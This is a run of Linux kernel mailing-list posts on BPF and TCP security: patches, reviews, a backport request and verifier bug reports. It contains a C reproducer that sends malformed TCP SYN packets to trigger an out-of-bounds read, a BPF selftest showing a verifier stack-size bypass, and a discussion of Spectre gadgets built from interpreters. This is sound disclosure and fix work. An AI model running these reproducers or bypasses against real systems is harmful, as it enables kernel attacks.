Re: [PATCH 0/3] bpf: allow zero-initialising hash map seed

2018-10-05 Thread Jann Horn
On Fri, Oct 5, 2018 at 4:27 PM Lorenz Bauer  wrote:
>
> On Mon, 1 Oct 2018 at 20:12, Daniel Borkmann  wrote:
> >
> > On 10/01/2018 12:45 PM, Lorenz Bauer wrote:
> > > This patch set adds a new flag BPF_F_ZERO_SEED, which allows
> > > forcing the seed used by hash maps to zero. This makes
> > > it possible to write deterministic tests.
> > >
> > > Based on an off-list conversation with Alexei Starovoitov and
> > > Daniel Borkmann.
> > >
> > > Lorenz Bauer (3):
> > >   bpf: allow zero-initializing hash map seed
> > >   tools: sync linux/bpf.h
> > >   tools: add selftest for BPF_F_ZERO_SEED
> > >
> > >  include/uapi/linux/bpf.h|  2 +
> > >  kernel/bpf/hashtab.c|  8 ++-
> > >  tools/include/uapi/linux/bpf.h  |  2 +
> > >  tools/testing/selftests/bpf/test_maps.c | 67 +
> > >  4 files changed, 66 insertions(+), 13 deletions(-)
> > >
> >
> > Please respin with proper SoB for each patch and non-empty commit
> > description.
>
> What does SoB mean? Point taken about the empty commit message.

SoB is the Signed-off-by line. See
https://www.kernel.org/doc/html/v4.17/process/submitting-patches.html#sign-your-work-the-developer-s-certificate-of-origin
.
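
For illustration, a minimal sketch of how a test could request the
deterministic seed through the raw bpf(2) syscall; the flag value (1U << 6)
is taken from the series above and may not exist in installed headers yet,
so treat this as a sketch rather than reference code:

#include <linux/bpf.h>
#include <stdio.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

#ifndef BPF_F_ZERO_SEED
#define BPF_F_ZERO_SEED (1U << 6)   /* value from the patch in this series */
#endif

int main(void)
{
    union bpf_attr attr;
    int fd;

    memset(&attr, 0, sizeof(attr));
    attr.map_type = BPF_MAP_TYPE_HASH;
    attr.key_size = 4;
    attr.value_size = 8;
    attr.max_entries = 128;
    attr.map_flags = BPF_F_ZERO_SEED;   /* deterministic bucket layout */

    fd = syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
    if (fd < 0) {
        perror("BPF_MAP_CREATE");
        return 1;
    }
    printf("hash map with zeroed seed: fd %d\n", fd);
    return 0;
}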


Re: [PATCH 1/3] bpf: allow zero-initializing hash map seed

2018-10-05 Thread Jann Horn
On Fri, Oct 5, 2018 at 4:21 PM Lorenz Bauer  wrote:
> On Fri, 5 Oct 2018 at 15:12, Jann Horn  wrote:
> > On Fri, Oct 5, 2018 at 9:42 AM Lorenz Bauer  wrote:
> > > On Tue, 2 Oct 2018 at 21:00, Jann Horn  wrote:
> > > > If this is for testing only, you can slap a capable(CAP_SYS_ADMIN)
> > > > check in here, right? I doubt it matters, but I don't really like
> > > > seeing something like this exposed to unprivileged userspace just
> > > > because you need it for kernel testing.
> > >
> > > That would mean all tests have to run as root / with CAP_SYS_ADMIN
> > > which isn't ideal.
> >
> > This patch basically means that it becomes easier for a local user to
> > construct a BPF hash table that has all of its values stuffed into a
> > single hash bucket, correct? Which makes it easier to create a BPF
> > program that generates unusually large RCU stalls by performing ~4
> > BPF map lookups, each of which has to walk through the entire linked
> > list of the hash map bucket? I dislike exposing something like that to
> > unprivileged userspace.
>
> That's a good point, for which I don't have an answer. You could argue that
> this was the status quo until the seed was randomised, so it seems
> like this hasn't been a worry so far. Should it be going forward?

I don't think that local DoS bugs, or bugs that locally degrade
performance, are a big deal, but I also think that the kernel should
try to avoid having such issues.

> > And if you want to run the whole BPF test suite with all its tests,
> > don't you already need root privileges? Or is this a different test
> > suite?
>
> No, I'm thinking about third parties that want to test their own BPF.

Ah. That wasn't clear to me from your patch description.

Can you please describe exactly why something that is not a kernel
unit test needs deterministic BPF hash map behavior?

> If you enable unprivileged BPF you can use BPF_PROG_TEST_RUN to
> test your programs without root, if I'm not mistaken.


Re: [PATCH 1/3] bpf: allow zero-initializing hash map seed

2018-10-05 Thread Jann Horn
On Fri, Oct 5, 2018 at 9:42 AM Lorenz Bauer  wrote:
> On Tue, 2 Oct 2018 at 21:00, Jann Horn  wrote:
> >
> > If this is for testing only, you can slap a capable(CAP_SYS_ADMIN)
> > check in here, right? I doubt it matters, but I don't really like
> > seeing something like this exposed to unprivileged userspace just
> > because you need it for kernel testing.
>
> That would mean all tests have to run as root / with CAP_SYS_ADMIN
> which isn't ideal.

This patch basically means that it becomes easier for a local user to
construct a BPF hash table that has all of its values stuffed into a
single hash bucket, correct? Which makes it easier to create a BPF
program that generates unusually large RCU stalls by performing ~4
BPF map lookups, each of which has to walk through the entire linked
list of the hash map bucket? I dislike exposing something like that to
unprivileged userspace.

And if you want to run the whole BPF test suite with all its tests,
don't you already need root privileges? Or is this a different test
suite?


Re: [PATCH 1/3] bpf: allow zero-initializing hash map seed

2018-10-02 Thread Jann Horn
On Mon, Oct 1, 2018 at 12:47 PM Lorenz Bauer  wrote:
>
> Add a new flag BPF_F_ZERO_SEED, which forces a hash map
> to initialize the seed to zero.
> ---
>  include/uapi/linux/bpf.h | 2 ++
>  kernel/bpf/hashtab.c | 8 ++--
>  2 files changed, 8 insertions(+), 2 deletions(-)
>
> diff --git a/include/uapi/linux/bpf.h b/include/uapi/linux/bpf.h
> index aa5ccd2385ed..9d15c8f179ac 100644
> --- a/include/uapi/linux/bpf.h
> +++ b/include/uapi/linux/bpf.h
> @@ -252,6 +252,8 @@ enum bpf_attach_type {
>  #define BPF_F_NO_COMMON_LRU(1U << 1)
>  /* Specify numa node during map creation */
>  #define BPF_F_NUMA_NODE(1U << 2)
> +/* Zero-initialize hash function seed */
> +#define BPF_F_ZERO_SEED(1U << 6)
>
>  /* flags for BPF_PROG_QUERY */
>  #define BPF_F_QUERY_EFFECTIVE  (1U << 0)
> diff --git a/kernel/bpf/hashtab.c b/kernel/bpf/hashtab.c
> index 2c1790288138..a79e123dae62 100644
> --- a/kernel/bpf/hashtab.c
> +++ b/kernel/bpf/hashtab.c
> @@ -23,7 +23,7 @@
>
>  #define HTAB_CREATE_FLAG_MASK  \
> (BPF_F_NO_PREALLOC | BPF_F_NO_COMMON_LRU | BPF_F_NUMA_NODE |\
> -BPF_F_RDONLY | BPF_F_WRONLY)
> +BPF_F_RDONLY | BPF_F_WRONLY | BPF_F_ZERO_SEED)
>
>  struct bucket {
> struct hlist_nulls_head head;
> @@ -373,7 +373,11 @@ static struct bpf_map *htab_map_alloc(union bpf_attr 
> *attr)
> if (!htab->buckets)
> goto free_htab;
>
> -   htab->hashrnd = get_random_int();
> +   if (htab->map.map_flags & BPF_F_ZERO_SEED)
> +   htab->hashrnd = 0;
> +   else
> +   htab->hashrnd = get_random_int();
> +

If this is for testing only, you can slap a capable(CAP_SYS_ADMIN)
check in here, right? I doubt it matters, but I don't really like
seeing something like this exposed to unprivileged userspace just
because you need it for kernel testing.
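
For reference, the kind of gate meant here could look roughly like the
following sketch; exactly where the check and its error path would sit in
htab_map_alloc() is glossed over, so this is an illustration rather than a
patch:

    /* sketch: refuse the deterministic seed for unprivileged users */
    if ((attr->map_flags & BPF_F_ZERO_SEED) && !capable(CAP_SYS_ADMIN))
        return ERR_PTR(-EPERM);

    if (htab->map.map_flags & BPF_F_ZERO_SEED)
        htab->hashrnd = 0;
    else
        htab->hashrnd = get_random_int();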


requesting stable backport of BPF security fix (commit dd066823db2ac4e22f721ec85190817b58059a54)

2018-09-25 Thread Jann Horn
Hi!

Per the policy at Documentation/networking/netdev-FAQ.rst, I'm sending
this to netdev@ and davem, rather than stable@; with a CC to security@
because I believe that this is a security process issue.

Upstream commit dd066823db2ac4e22f721ec85190817b58059a54
("bpf/verifier: disallow pointer subtraction") fixes a security bug
(kernel pointer leak to unprivileged userspace). The fix has been in
Linus' tree since about a week ago, but the patch still doesn't appear
in Greg's linux-4.18.y linux-stable-rc repo, in Greg's 4.18
stable-queue, or in davem's stable queue at
http://patchwork.ozlabs.org/bundle/davem/stable/?state=* .

Please queue it up for backporting.

I am curious: Why was this not queued up for stable immediately? Or
was it, and I looked in the wrong place?


Re: [PATCH net] inet: frag: enforce memory limits earlier

2018-07-31 Thread Jann Horn
On Tue, Jul 31, 2018 at 7:54 AM Florian Westphal  wrote:
>
> Eric Dumazet  wrote:
> > We currently check current frags memory usage only when
> > a new frag queue is created. This allows attackers to first
> > consume the memory budget (default : 4 MB) creating thousands
> > of frag queues, then sending tiny skbs to exceed high_thresh
> > limit by 2 to 3 order of magnitude.
> >
> > Note that before commit 648700f76b03 ("inet: frags: use rhashtables
> > for reassembly units"), work queue could be starved under DOS,
> > getting no cpu cycles.
> > After commit 648700f76b03, only the per frag queue timer can eventually
> > remove an incomplete frag queue and its skbs.
>
> I'm not sure this is a good idea.
>
> This can now prevent "good" queue from completing just because attacker
> is sending garbage.

There is only a limited amount of memory available to store fragments.
If you receive lots of fragments that don't form complete packets,
you'll have to drop some packets. I don't see why it matters whether
incoming garbage only prevents the creation of new queues or also the
completion of existing queues.


Re: [PATCH v2 net-next 1/4] umh: introduce fork_usermode_blob() helper

2018-05-04 Thread Jann Horn
On Thu, May 3, 2018 at 12:36 AM, Alexei Starovoitov  wrote:
> Introduce helper:
> int fork_usermode_blob(void *data, size_t len, struct umh_info *info);
> struct umh_info {
>struct file *pipe_to_umh;
>struct file *pipe_from_umh;
>pid_t pid;
> };
>
> that GPLed kernel modules (signed or unsigned) can use it to execute part
> of its own data as swappable user mode process.
>
> The kernel will do:
> - mount "tmpfs"
> - allocate a unique file in tmpfs
> - populate that file with [data, data + len] bytes
> - user-mode-helper code will do_execve that file and, before the process
>   starts, the kernel will create two unix pipes for bidirectional
>   communication between kernel module and umh
> - close tmpfs file, effectively deleting it
> - the fork_usermode_blob will return zero on success and populate
>   'struct umh_info' with two unix pipes and the pid of the user process
>
> As the first step in the development of the bpfilter project
> the fork_usermode_blob() helper is introduced to allow user mode code
> to be invoked from a kernel module. The idea is that user mode code plus
> normal kernel module code are built as part of the kernel build
> and installed as traditional kernel module into distro specified location,
> such that from a distribution point of view, there is
> no difference between regular kernel modules and kernel modules + umh code.
> Such modules can be signed, modprobed, rmmod, etc. The use of this new helper
> by a kernel module doesn't make it any special from kernel and user space
> tooling point of view.
[...]
> +static struct vfsmount *umh_fs;
> +
> +static int init_tmpfs(void)
> +{
> +   struct file_system_type *type;
> +
> +   if (umh_fs)
> +   return 0;
> +   type = get_fs_type("tmpfs");
> +   if (!type)
> +   return -ENODEV;
> +   umh_fs = kern_mount(type);
> +   if (IS_ERR(umh_fs)) {
> +   int err = PTR_ERR(umh_fs);
> +
> +   put_filesystem(type);
> +   umh_fs = NULL;
> +   return err;
> +   }
> +   return 0;
> +}

Should init_tmpfs() be holding some sort of mutex if it's fiddling
with `umh_fs`? The current code only calls it in initcall context, but
if that ever changes and two processes try to initialize the tmpfs at
the same time, a few things could go wrong.
I guess Luis' suggestion (putting a call to init_tmpfs() in
do_basic_setup()) might be the easiest way to get rid of that problem.
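
As an illustration, one way the initialization could be serialized; the
mutex name is invented here and this is only a sketch, not part of the
posted patch:

static DEFINE_MUTEX(umh_fs_mutex);   /* hypothetical lock for this sketch */

static int init_tmpfs(void)
{
    struct file_system_type *type;
    int err = 0;

    mutex_lock(&umh_fs_mutex);
    if (umh_fs)
        goto out;                     /* already mounted */
    type = get_fs_type("tmpfs");
    if (!type) {
        err = -ENODEV;
        goto out;
    }
    umh_fs = kern_mount(type);
    if (IS_ERR(umh_fs)) {
        err = PTR_ERR(umh_fs);
        put_filesystem(type);
        umh_fs = NULL;
    }
out:
    mutex_unlock(&umh_fs_mutex);
    return err;
}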

> +static int alloc_tmpfs_file(size_t size, struct file **filp)
> +{
> +   struct file *file;
> +   int err;
> +
> +   err = init_tmpfs();
> +   if (err)
> +   return err;
> +   file = shmem_file_setup_with_mnt(umh_fs, "umh", size, VM_NORESERVE);
> +   if (IS_ERR(file))
> +   return PTR_ERR(file);
> +   *filp = file;
> +   return 0;
> +}


[PATCH net] bpf: sockmap remove dead check

2018-04-20 Thread Jann Horn
Remove dead code that bails on `attr->value_size > KMALLOC_MAX_SIZE` - the
previous check already bails on `attr->value_size != 4`.

Signed-off-by: Jann Horn <ja...@google.com>
---
 kernel/bpf/sockmap.c | 3 ---
 1 file changed, 3 deletions(-)

diff --git a/kernel/bpf/sockmap.c b/kernel/bpf/sockmap.c
index 8dd9210d7db7..a3b21385e947 100644
--- a/kernel/bpf/sockmap.c
+++ b/kernel/bpf/sockmap.c
@@ -1442,9 +1442,6 @@ static struct bpf_map *sock_map_alloc(union bpf_attr 
*attr)
attr->value_size != 4 || attr->map_flags & ~SOCK_CREATE_FLAG_MASK)
return ERR_PTR(-EINVAL);
 
-   if (attr->value_size > KMALLOC_MAX_SIZE)
-   return ERR_PTR(-E2BIG);
-
err = bpf_tcp_ulp_register();
if (err && err != -EEXIST)
return ERR_PTR(err);
-- 
2.17.0.484.g0c8726318c-goog



[PATCH net] tcp: don't read out-of-bounds opsize

2018-04-20 Thread Jann Horn
The old code reads the "opsize" variable from out-of-bounds memory (first
byte behind the segment) if a broken TCP segment ends directly after an
opcode that is neither EOL nor NOP.

The result of the read isn't used for anything, so the worst thing that
could theoretically happen is a pagefault; and since the physmap is usually
mostly contiguous, even that seems pretty unlikely.

The following C reproducer triggers the uninitialized read - however, you
can't actually see anything happen unless you put something like a
pr_warn() in tcp_parse_md5sig_option() to print the opsize.
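
For readers without the source at hand, the option walk in
tcp_parse_md5sig_option() is roughly the following (a simplified sketch,
not the exact kernel code); the stray read is the opsize fetch in the
default case when the options end right after the opcode byte:

/* Sketch of tcp_parse_md5sig_option(), simplified for illustration. */
const u8 *tcp_parse_md5sig_option(const struct tcphdr *th)
{
    int length = (th->doff << 2) - sizeof(*th);   /* bytes of TCP options */
    const u8 *ptr = (const u8 *)(th + 1);

    while (length > 0) {                          /* old loop condition */
        int opcode = *ptr++;
        int opsize;

        switch (opcode) {
        case TCPOPT_EOL:
            return NULL;
        case TCPOPT_NOP:
            length--;
            continue;
        default:
            opsize = *ptr++;   /* with length == 1 this reads one byte past
                                * the end of the segment */
            if (opsize < 2 || opsize > length)
                return NULL;   /* for length == 1 this always bails, so the
                                * out-of-bounds value is never actually used */
            if (opcode == TCPOPT_MD5SIG && opsize == TCPOLEN_MD5SIG)
                return ptr;
            ptr += opsize - 2;
            length -= opsize;
        }
    }
    return NULL;
}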


#define _GNU_SOURCE
#include <arpa/inet.h>
#include <assert.h>
#include <err.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <netinet/in.h>
#include <linux/if.h>
#include <linux/if_tun.h>
#include <linux/ip.h>
#include <linux/tcp.h>

void systemf(const char *command, ...) {
  char *full_command;
  va_list ap;
  va_start(ap, command);
  if (vasprintf(&full_command, command, ap) == -1)
err(1, "vasprintf");
  va_end(ap);
  printf("systemf: <<<%s>>>\n", full_command);
  system(full_command);
}

char *devname;

int tun_alloc(char *name) {
  int fd = open("/dev/net/tun", O_RDWR);
  if (fd == -1)
err(1, "open tun dev");
  static struct ifreq req = { .ifr_flags = IFF_TUN|IFF_NO_PI };
  strcpy(req.ifr_name, name);
  if (ioctl(fd, TUNSETIFF, &req))
err(1, "TUNSETIFF");
  devname = req.ifr_name;
  printf("device name: %s\n", devname);
  return fd;
}

#define IPADDR(a,b,c,d) (((a)<<0)+((b)<<8)+((c)<<16)+((d)<<24))

void sum_accumulate(unsigned int *sum, void *data, int len) {
  assert((len&2)==0);
  for (int i=0; i<len/2; i++)
    *sum += ntohs(((unsigned short *)data)[i]);
}

unsigned short sum_final(unsigned int sum) {
  sum = (sum >> 16) + (sum & 0xffff);
  sum = (sum >> 16) + (sum & 0xffff);
  return htons(~sum);
}

void fix_ip_sum(struct iphdr *ip) {
  unsigned int sum = 0;
  sum_accumulate(&sum, ip, sizeof(*ip));
  ip->check = sum_final(sum);
}

void fix_tcp_sum(struct iphdr *ip, struct tcphdr *tcp) {
  unsigned int sum = 0;
  struct {
unsigned int saddr;
unsigned int daddr;
unsigned char pad;
unsigned char proto_num;
unsigned short tcp_len;
  } fakehdr = {
.saddr = ip->saddr,
.daddr = ip->daddr,
.proto_num = ip->protocol,
.tcp_len = htons(ntohs(ip->tot_len) - ip->ihl*4)
  };
  sum_accumulate(&sum, &fakehdr, sizeof(fakehdr));
  sum_accumulate(&sum, tcp, tcp->doff*4);
  tcp->check = sum_final(sum);
}

int main(void) {
  int tun_fd = tun_alloc("inject_dev%d");
  systemf("ip link set %s up", devname);
  systemf("ip addr add 192.168.42.1/24 dev %s", devname);

  struct {
struct iphdr ip;
struct tcphdr tcp;
unsigned char tcp_opts[20];
  } __attribute__((packed)) syn_packet = {
.ip = {
  .ihl = sizeof(struct iphdr)/4,
  .version = 4,
  .tot_len = htons(sizeof(syn_packet)),
  .ttl = 30,
  .protocol = IPPROTO_TCP,
  /* FIXUP check */
  .saddr = IPADDR(192,168,42,2),
  .daddr = IPADDR(192,168,42,1)
},
.tcp = {
  .source = htons(1),
  .dest = htons(1337),
  .seq = 0x12345678,
  .doff = (sizeof(syn_packet.tcp)+sizeof(syn_packet.tcp_opts))/4,
  .syn = 1,
  .window = htons(64),
  .check = 0 /*FIXUP*/
},
.tcp_opts = {
  /* INVALID: trailing MD5SIG opcode after NOPs */
  1, 1, 1, 1, 1,
  1, 1, 1, 1, 1,
  1, 1, 1, 1, 1,
  1, 1, 1, 1, 19
}
  };
  fix_ip_sum(&syn_packet.ip);
  fix_tcp_sum(&syn_packet.ip, &syn_packet.tcp);
  while (1) {
    int write_res = write(tun_fd, &syn_packet, sizeof(syn_packet));
if (write_res != sizeof(syn_packet))
  err(1, "packet write failed");
  }
}


Fixes: cfb6eeb4c860 ("[TCP]: MD5 Signature Option (RFC2385) support.")
Signed-off-by: Jann Horn <ja...@google.com>
---
 net/ipv4/tcp_input.c | 7 ++-
 1 file changed, 2 insertions(+), 5 deletions(-)

diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
index 367def6ddeda..e51c644484dc 100644
--- a/net/ipv4/tcp_input.c
+++ b/net/ipv4/tcp_input.c
@@ -3868,11 +3868,8 @@ const u8 *tcp_parse_md5sig_option(const struct tcphdr 
*th)
int length = (th->doff << 2) - sizeof(*th);
const u8 *ptr = (const u8 *)(th + 1);
 
-   /* If the TCP option is too short, we can short cut */
-   if (length < TCPOLEN_MD5SIG)
-   return NULL;
-
-   while (length > 0) {
+   /* If not enough data remaining, we can short cut */
+   while (length >= TCPOLEN_MD5SIG) {
int opcode = *ptr++;
int opsize;
 
-- 
2.17.0.484.g0c8726318c-goog



Re: nft/bpf interpreters and spectre2. Was: [PATCH RFC 0/4] net: add bpfilter

2018-02-22 Thread Jann Horn
[resend as plaintext, apparently mobile gmail will send HTML mails]

On Thu, Feb 22, 2018 at 3:20 AM, Alexei Starovoitov
 wrote:
> On Wed, Feb 21, 2018 at 01:13:03PM +0100, Florian Westphal wrote:
>>
>> Obvious candidates are: meta, numgen, limit, objref, quota, reject.
>>
>> We should probably also consider removing
>> CONFIG_NFT_SET_RBTREE and CONFIG_NFT_SET_HASH and just always
>> build both too (at least rbtree since that offers interval).
>>
>> For the indirect call issue we can use direct calls from eval loop for
>> some of the more frequently used ones, similar to what we do already
>> for nft_cmp_fast_expr.
>
> nft_cmp_fast_expr and other expressions mentioned above made me thinking...
>
> do we have the same issue with nft interpreter as we had with bpf one?
> bpf interpreter was used as part of spectre2 attack to leak
> information via cache side channel and let VM read hypervisor memory.
> Due to that issue we removed bpf interpreter from the kernel code.
> That's what CONFIG_BPF_JIT_ALWAYS_ON for...
> but we still have nft interpreter in the kernel that can also
> execute arbitrary nft expressions.
>
> Jann's exploit used the following bpf instructions:
[...]
>
> and a gadget to jump into __bpf_prog_run with insn pointing
> to memory controlled by the guest while accessible
> (at different virt address) by the hypervisor.
>
> It seems possible to construct similar sequence of instructions
> out of nft expressions and use gadget that jumps into nft_do_chain().
[...]
> Obviously such exploit is harder to do than bpf based one.
> Do we need to do anything about it ?
> May be it's easier to find gadgets in .text of vmlinux
> instead of messing with interpreters?
>
> Jann,
> can you comment on removing interpreters in general?
> Do we need to worry about having bpf and/or nft interpreter
> in the kernel?

I think that for Spectre V2, the presence of interpreters isn't a big
problem. It simplifies writing attacks a bit, but I don't expect it to
be necessary if an attacker invests some time into finding useful
gadgets.


Re: [PATCH bpf-next 1/2] bpf: fix maximum stack depth tracking logic

2017-12-22 Thread Jann Horn
On Sat, Dec 23, 2017 at 3:07 AM, Alexei Starovoitov
<alexei.starovoi...@gmail.com> wrote:
> On Sat, Dec 23, 2017 at 02:38:29AM +0100, Jann Horn wrote:
>> On Fri, Dec 22, 2017 at 10:33 PM, Alexei Starovoitov <a...@kernel.org> wrote:
>> > instead of computing max stack depth for current call chain only
>> > track the maximum possible stack depth of any function at given
>> > frame position. Such algorithm is simple and fast, but conservative,
>> > since it overestimates amount of stack used. Consider:
>> > main() // stack 32
>> > {
>> >   A();
>> >   B();
>> > }
>> >
>> > A(){} // stack 256
>> >
>> > B()  // stack 64
>> > {
>> >   A();
>> > }
>> >
>> > since A() is called at frame[1] and frame[2], the algorithm
>> > will estimate the max stack depth as 32 + 256 + 256 and will reject
>> > such program, though real max is 32 + 64 + 256.
>> >
>> > Fortunately the algorithm is good enough in practice. The alternative
>> > would be to track max stack of every function in the fast pass through
>> > the verifier and then do additional CFG walk just to compute max total.
>> >
>> > Fixes: f4d7e40a5b71 ("bpf: introduce function calls (verification)")
>> > Reported-by: Jann Horn <ja...@google.com>
>> > Signed-off-by: Alexei Starovoitov <a...@kernel.org>
>>
>> Does this work in cases where multiple invocations of a function have
>> different stack access patterns because their inputs have different
>> bounds?
>>
>> Consider this pseudocode example:
>>
>> void main(void) {
>>   func1(0);
>>   func1(1);
>>   func2(1);
>> }
>> void func1(int alloc_or_recurse) {
>>   if (alloc_or_recurse) {
>> frame_pointer[-300] = 1;
>>   } else {
>> func2(alloc_or_recurse);
>>   }
>> }
>> void func2(int alloc_or_recurse) {
>>   if (alloc_or_recurse) {
>> frame_pointer[-300] = 1;
>>   }
>> }
>>
>> AFAICS this will work as follows:
>>
>> Call to func1->func2 runs without any stack accesses because the
>> verifier can prove that alloc_or_recurse is 0.
>
> argh. right.
> I guess that ruins my attemp to do the stack check inline
> with the main verifier pass.
> Do you see an algorithm that can do it without extra
> cfg walk at the end?

A crappy heuristic would be to forbid recursion (calling a function
that is already present somewhere in the call stack) and then sum up
the maximum stack depths of all functions at the end and see whether
the sum is bigger than the maximum stack size. While it'd be horribly
conservative, it might work for now? 512 bytes are a lot of stack.
Or as a more complicated, but slightly less conservative heuristic,
you could forbid recursion, record the maximum number of stack frames
(max_stack_frames), then at the end select the top max_stack_frames
functions with the biggest stack sizes and sum up their sizes? (Or if
you want to support recursion, check
max_stack_frames*biggest_frame_size<=MAX_BPF_STACK.)
Anything else I can come up with is probably more complicated than an
extra cfg walk.
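
A sketch of the crude variant described above; all names are invented for
illustration, and MAX_BPF_STACK is the 512-byte limit mentioned:

#define MAX_BPF_STACK 512

static int stack_ok_conservative(const unsigned int *func_stack_size,
                                 int nr_funcs, int max_call_depth)
{
    unsigned int biggest = 0;
    int i;

    for (i = 0; i < nr_funcs; i++)
        if (func_stack_size[i] > biggest)
            biggest = func_stack_size[i];

    /* with recursion forbidden, no chain has more than max_call_depth frames */
    return (unsigned long long)max_call_depth * biggest <= MAX_BPF_STACK;
}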


Re: [PATCH bpf-next 1/2] bpf: fix maximum stack depth tracking logic

2017-12-22 Thread Jann Horn
On Fri, Dec 22, 2017 at 10:33 PM, Alexei Starovoitov <a...@kernel.org> wrote:
> instead of computing max stack depth for current call chain only
> track the maximum possible stack depth of any function at given
> frame position. Such algorithm is simple and fast, but conservative,
> since it overestimates amount of stack used. Consider:
> main() // stack 32
> {
>   A();
>   B();
> }
>
> A(){} // stack 256
>
> B()  // stack 64
> {
>   A();
> }
>
> since A() is called at frame[1] and frame[2], the algorithm
> will estimate the max stack depth as 32 + 256 + 256 and will reject
> such program, though real max is 32 + 64 + 256.
>
> Fortunately the algorithm is good enough in practice. The alternative
> would be to track max stack of every function in the fast pass through
> the verifier and then do additional CFG walk just to compute max total.
>
> Fixes: f4d7e40a5b71 ("bpf: introduce function calls (verification)")
> Reported-by: Jann Horn <ja...@google.com>
> Signed-off-by: Alexei Starovoitov <a...@kernel.org>

Does this work in cases where multiple invocations of a function have
different stack access patterns because their inputs have different
bounds?

Consider this pseudocode example:

void main(void) {
  func1(0);
  func1(1);
  func2(1);
}
void func1(int alloc_or_recurse) {
  if (alloc_or_recurse) {
frame_pointer[-300] = 1;
  } else {
func2(alloc_or_recurse);
  }
}
void func2(int alloc_or_recurse) {
  if (alloc_or_recurse) {
frame_pointer[-300] = 1;
  }
}

AFAICS this will work as follows:

Call to func1->func2 runs without any stack accesses because the
verifier can prove that alloc_or_recurse is 0.
Second call to func1 allocates stack memory, bumping up
frame_stack_depth[1].
Second call to func2 allocates stack memory, leaving
frame_stack_depth[1] the same.

So I think this will still pass the verifier, even though func1
and func2 will end up with 300 bytes stack memory each, causing
the func1->func2 call to use more stack memory than permitted.


Re: correctness of BPF stack size checking logic for multi-function programs?

2017-12-22 Thread Jann Horn
On Fri, Dec 22, 2017 at 4:37 AM, Alexei Starovoitov
<alexei.starovoi...@gmail.com> wrote:
> On Fri, Dec 22, 2017 at 02:14:45AM +0100, Jann Horn wrote:
>> Hi!
>>
>> I saw the recently-added support for multiple functions in a single
>> program in BPF. I've stumbled over something that looks like it might
>> be a bug; I haven't verified it yet, but I thought I should give you a
>> heads-up before this lands in a release in case I'm right. If I'm
>> wrong, it might be worth adding a comment to stacksafe() that explains
>> why.
[...]
> but I will rewrite a test case for it unless you beat me to it :)

I just sent a failing test case for the case I'm talking about, subject
"[PATCH] bpf: selftest for late caller stack size increase".


[PATCH] bpf: selftest for late caller stack size increase

2017-12-22 Thread Jann Horn
This checks that it is not possible to bypass the total stack size check in
update_stack_depth() by calling a function that uses a large amount of
stack memory *before* using a large amount of stack memory in the caller.

Currently, the first added testcase causes a rejection as expected, but
the second testcase is (AFAICS incorrectly) accepted:

[...]
#483/p calls: stack overflow using two frames (post-call access) FAIL
Unexpected success to load!
0: (85) call pc+2
caller:
 R10=fp0,call_-1
callee:
 frame1: R1=ctx(id=0,off=0,imm=0) R10=fp0,call_0
3: (72) *(u8 *)(r10 -300) = 0
4: (b7) r0 = 0
5: (95) exit
returning from callee:
 frame1: R0_w=inv0 R1=ctx(id=0,off=0,imm=0) R10=fp0,call_0
to caller at 1:
 R0_w=inv0 R10=fp0,call_-1

from 5 to 1: R0=inv0 R10=fp0,call_-1
1: (72) *(u8 *)(r10 -300) = 0
2: (95) exit
processed 6 insns, stack depth 300+300
[...]
Summary: 704 PASSED, 1 FAILED

AFAICS the JIT-generated code for the second testcase shows that this
really causes the stack pointer to be decremented by 300+300:

first function:
00000000  55                push rbp
00000001  4889E5            mov rbp,rsp
00000004  4881EC58010000    sub rsp,0x158
0000000B  4883ED28          sub rbp,byte +0x28
[...]
00000025  E89AB3AFE5        call 0xe5afb3c4
0000002A  C685D4FEFFFF00    mov byte [rbp-0x12c],0x0
[...]
00000041  4883C528          add rbp,byte +0x28
00000045  C9                leave
00000046  C3                ret

second function:
00000000  55                push rbp
00000001  4889E5            mov rbp,rsp
00000004  4881EC58010000    sub rsp,0x158
0000000B  4883ED28          sub rbp,byte +0x28
[...]
00000025  C685D4FEFFFF00    mov byte [rbp-0x12c],0x0
[...]
0000003E  4883C528          add rbp,byte +0x28
00000042  C9                leave
00000043  C3                ret

Signed-off-by: Jann Horn <ja...@google.com>
---
 tools/testing/selftests/bpf/test_verifier.c | 34 +
 1 file changed, 34 insertions(+)

diff --git a/tools/testing/selftests/bpf/test_verifier.c 
b/tools/testing/selftests/bpf/test_verifier.c
index 3bacff0d6f91..71fb0be81b78 100644
--- a/tools/testing/selftests/bpf/test_verifier.c
+++ b/tools/testing/selftests/bpf/test_verifier.c
@@ -8729,6 +8729,40 @@ static struct bpf_test tests[] = {
.prog_type = BPF_PROG_TYPE_XDP,
.result = ACCEPT,
},
+   {
+   "calls: stack overflow using two frames (pre-call access)",
+   .insns = {
+   /* prog 1 */
+   BPF_ST_MEM(BPF_B, BPF_REG_10, -300, 0),
+   BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 1, 0, 1),
+   BPF_EXIT_INSN(),
+
+   /* prog 2 */
+   BPF_ST_MEM(BPF_B, BPF_REG_10, -300, 0),
+   BPF_MOV64_IMM(BPF_REG_0, 0),
+   BPF_EXIT_INSN(),
+   },
+   .prog_type = BPF_PROG_TYPE_XDP,
+   .errstr = "combined stack size",
+   .result = REJECT,
+   },
+   {
+   "calls: stack overflow using two frames (post-call access)",
+   .insns = {
+   /* prog 1 */
+   BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 1, 0, 2),
+   BPF_ST_MEM(BPF_B, BPF_REG_10, -300, 0),
+   BPF_EXIT_INSN(),
+
+   /* prog 2 */
+   BPF_ST_MEM(BPF_B, BPF_REG_10, -300, 0),
+   BPF_MOV64_IMM(BPF_REG_0, 0),
+   BPF_EXIT_INSN(),
+   },
+   .prog_type = BPF_PROG_TYPE_XDP,
+   .errstr = "combined stack size",
+   .result = REJECT,
+   },
{
"calls: spill into caller stack frame",
.insns = {
-- 
2.15.1.620.gb9897f4670-goog



correctness of BPF stack size checking logic for multi-function programs?

2017-12-21 Thread Jann Horn
Hi!

I saw the recently-added support for multiple functions in a single
program in BPF. I've stumbled over something that looks like it might
be a bug; I haven't verified it yet, but I thought I should give you a
heads-up before this lands in a release in case I'm right. If I'm
wrong, it might be worth adding a comment to stacksafe() that explains
why.

stacksafe() has the following code:

/* if explored stack has more populated slots than current stack
* such stacks are not equivalent
*/
